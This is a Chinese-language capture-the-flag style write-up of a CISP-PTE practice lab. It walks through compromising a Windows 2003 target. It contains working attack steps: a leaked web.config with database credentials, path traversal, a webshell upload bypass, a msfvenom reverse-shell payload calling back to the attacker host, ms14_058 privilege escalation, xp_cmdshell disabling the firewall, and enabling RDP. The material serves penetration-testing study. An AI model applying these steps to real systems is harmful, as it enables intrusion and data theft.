实验环境
攻击机:Kali
IP 地址:192.168.18.130
靶机:pte-win2003(windows)
IP 地址:192.168.18.145
网络:两个主机须在同一局域网下,所以虚拟机的网络配置器必须相同
一、信息收集
正常扫描nmap -sS 192.168.18.145 -T4 发现只开放了一个sql-server 随即全端口扫描
访问网站 
御剑扫描完发现有爬虫协议
二、解题步骤
访问首页
看看有没有信息泄露
在网络安全和渗透测试中,Git文件泄露是一个重要的考察点,因为它可能导致敏感信息(如源代码、配置文件、密码等)的暴露。
手动检查的方法为url/.git ,这里无法访问但是提示了目标为iis
iis默认配置文件为web.config看看有没有备份文件
http://192.168.18.145:27689/web.config.bak
成功下载并访问,这里把数据库信息显示了出来
链接数据库
查询到密码
登录得到key1
发现目标存在着注入,但是我们已经连接上数据库意义不大,尝试写入一句话木马,或者oshell,尝试失败
这里选择常规的文件上传,测试奇怪后缀也被拦判断为白名单
这里想尝试文件包含图片马,然后默认aspx文件本身就是一个一句话木马,但是被误导了一直找到下载文件的接口去
192.168.18.145:27689/admin/file_down.aspx?file=638596652953750000-111111111.jpg
附:这里通过网上wp发现fuzz之后最终回溯两层目录到web根目录并下载web.config
192.168.18.145:27689/admin/file_down.aspx?file=../../web.cofig
转变思路观察到文件说明上传剪切后缀
经过测试 配合上时间戳后 文件名设置八位刚好jpg被隐藏 
上传一句话木马
最后峰回路转在这里发现文件上传路径,真正的文件在这里,不应该去下载文件的,刚上传文件什么的找错了思路,在这里把那个aspx文件下载下来,并且能看到里面的密码,找到该文件的真实位置:
蚁剑连接上去自己上传的马子
成功得到key2
或者直接使用这个木马里面就是一句话木马
手工法
这里登录进来发现数据库的账号密码
查询到key.txt,得到key3
或者后渗透
msf上线
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.18.130 LPORT=8848 -f exe -o 1.exe
msf6 exploit(multi/hams/steamed) > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set LHOST 192.168.18.130 LHOST => 192.168.18.130 msf6 exploit(multi/handler) > set PORT 8848 LPORT => 8848 msf6 exploit(multi/handler) > exploit
通过剑蚁上传到靶机后,通过虚拟终端shell来运行程序
成功上线后,使用bg维持会话的同时继续执行其他模块,
bg search ms14_058 use 0 set seesion 1 set LPORT set LHOST run
提权成功
解密
meterpreter > run post/windows/manage/enable_rdp
发现开启不了跟着网上的教程走一下msf版本sa提权
msf6 auxiliary(admin/mssql/mssql_exec) > set usname sa usname => sa msf6 auxiliary(admin/mssql/mssql_exec) > set usname sa usname => sa msf6 auxiliary(admin/mssql/mssql_exec) > set password cisp-pte@sa password => cisp-pte@sa msf6 auxiliary(admin/mssql/mssql_exec) > set RHOSTS 192.168.18.145 RHOSTS => 192.168.18.145 msf6 auxiliary(admin/mssql/mssql_exec) > set RPORT 1433 RPORT => 1433 msf6 auxiliary(admin/mssql/mssql_exec) > set CMD cmd.exe /c "netsh firewall set opmode disable" CMD => cmd.exe /c netsh firewall set opmode disable msf6 auxiliary(admin/mssql/mssql_exec) > run [*] Running module against 192.168.18.145 [*] 192.168.18.145:1433 - SQL Query: EXEC master..xp_cmdshell 'cmd.exe /c netsh firewall set opmode disable'
远连成功
附一个wmic法
开启3389
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
